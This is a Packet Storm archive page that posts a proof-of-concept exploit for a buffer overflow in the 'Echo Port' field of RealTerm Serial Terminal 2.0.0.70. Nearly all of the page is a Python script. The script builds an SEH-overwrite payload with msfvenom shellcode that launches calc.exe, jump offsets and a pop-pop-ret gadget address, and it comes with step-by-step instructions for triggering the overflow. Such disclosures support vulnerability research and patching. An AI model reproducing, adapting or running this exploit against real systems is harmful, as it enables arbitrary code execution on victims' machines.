what you don't know can hurt you

RealTerm Serial Terminal 2.0.0.70 Echo Port Buffer Overflow

RealTerm Serial Terminal 2.0.0.70 Echo Port Buffer Overflow
Posted Mar 6, 2019
Authored by Matteo Malvica, Hodorsec, Alejandra Sanchez

RealTerm Serial Terminal version 2.0.0.70 suffers from an echo port buffer overflow vulnerability. Modifications to the original proof of concept include the fact that it uses a larger payload size for shellcode due to different jump offsets and filters the bad character 0x3a as this is the character for port which causes an error ":".

tags | exploit, overflow, shellcode, proof of concept
MD5 | 9b31bdb38b680b223198f700a17dcfa6

RealTerm Serial Terminal 2.0.0.70 Echo Port Buffer Overflow

Change Mirror Download
#!/usr/bin/python

# Exploit Title: RealTerm: Serial Terminal 2.0.0.70 - 'Echo Port' Buffer Overflow - (SEH)
# Version: 2.0.0.70
# Credits to: Alejandra Sanchez for finding initial DoS
# https://www.exploit-db.com/exploits/46391
# Matteo Malvica for creating initial PoC
# https://www.exploit-db.com/exploits/46441
# Differences: - Uses a larger space for shellcode, 260 bytes, due to more precise jumping and less NOP padding
# - Filtered on char 0x3a representing ":", which causes "Invalid port" error in program
# Date: 06-03-2019
# Author: Hodorsec (hodorsec@protonmail.com / hodor@hodorsec.com)
# Vendor Homepage: https://realterm.sourceforge.io/
# Software Link: https://sourceforge.net/projects/realterm/files/
# Tested on: Win7 x86 SP1 build 7601, Win8 6.3 build 9600
# Caveats: SEHOP disabled in registry, although this is also true for PoC EDB-ID 46441 since the PoC wouldn't work otherwise

# 1.- Run the python script it will create a new file as indicated by "filename" variable
# 2.- Copy the content of the created file to clipboard
# 3.- Open realterm.exe
# 4.- Go to 'Echo Port' tab
# 5.- Paste clipboard in 'Port' field
# 6.- Click on button -> Change
# 7.- Check 'Echo On'
# 8.- Result

import sys, struct

filename = "sploit_realterm_custom-calc_x86.txt"

# Shellcode
# msfvenom -p windows/exec cmd=calc.exe -a x86 --platform windows -v shellcode -f python -b "\x0a\x0d\x00\x3a\x20"
# Payload size: 220 bytes
shellcode = ""
shellcode += "\xbf\x83\xe7\x1e\x48\xd9\xec\xd9\x74\x24\xf4\x58"
shellcode += "\x33\xc9\xb1\x31\x31\x78\x13\x03\x78\x13\x83\xc0"
shellcode += "\x87\x05\xeb\xb4\x6f\x4b\x14\x45\x6f\x2c\x9c\xa0"
shellcode += "\x5e\x6c\xfa\xa1\xf0\x5c\x88\xe4\xfc\x17\xdc\x1c"
shellcode += "\x77\x55\xc9\x13\x30\xd0\x2f\x1d\xc1\x49\x13\x3c"
shellcode += "\x41\x90\x40\x9e\x78\x5b\x95\xdf\xbd\x86\x54\x8d"
shellcode += "\x16\xcc\xcb\x22\x13\x98\xd7\xc9\x6f\x0c\x50\x2d"
shellcode += "\x27\x2f\x71\xe0\x3c\x76\x51\x02\x91\x02\xd8\x1c"
shellcode += "\xf6\x2f\x92\x97\xcc\xc4\x25\x7e\x1d\x24\x89\xbf"
shellcode += "\x92\xd7\xd3\xf8\x14\x08\xa6\xf0\x67\xb5\xb1\xc6"
shellcode += "\x1a\x61\x37\xdd\xbc\xe2\xef\x39\x3d\x26\x69\xc9"
shellcode += "\x31\x83\xfd\x95\x55\x12\xd1\xad\x61\x9f\xd4\x61"
shellcode += "\xe0\xdb\xf2\xa5\xa9\xb8\x9b\xfc\x17\x6e\xa3\x1f"
shellcode += "\xf8\xcf\x01\x6b\x14\x1b\x38\x36\x72\xda\xce\x4c"
shellcode += "\x30\xdc\xd0\x4e\x64\xb5\xe1\xc5\xeb\xc2\xfd\x0f"
shellcode += "\x48\x3c\xb4\x12\xf8\xd5\x11\xc7\xb9\xbb\xa1\x3d"
shellcode += "\xfd\xc5\x21\xb4\x7d\x32\x39\xbd\x78\x7e\xfd\x2d"
shellcode += "\xf0\xef\x68\x52\xa7\x10\xb9\x31\x26\x83\x21\x98"
shellcode += "\xcd\x23\xc3\xe4"

# Maximum length
maxlen = 1000

# Crash offsets
crash_nseh = 268
crash_seh = crash_nseh + 4

# JMP offset
ret_jmp = 262

# Padding
pad = "\x90" * 2

# Variables
prefix = pad # Initial padding
prefix += shellcode # Custom shellcode, max size 260 bytes
prefix += "B" * (ret_jmp - len(prefix)) # Filler until return point of negative jump
prefix += "\xE9\xF7\xFE\xFF\xFF" # JMP 0xFFFFFEFC # Jmp to beginning of buffer
prefix += "C" * (crash_nseh - len(prefix)) # Filler until return point of NSEH negative jump
nseh = "\xeb\xf8\x90\x90" # JMP SHORT 0x8 # NOP # NOP
seh = struct.pack("<L", 0x00406e27) # pop ecx # pop ebp # ret 0x04 # realterm.exe
suffix = "D" * (maxlen - len(prefix + nseh + seh)) # Just filling

# Constructing payload
payload = prefix + nseh + seh + suffix

f = open(filename, 'wb')
f.write(payload)
f.close()

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    1 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close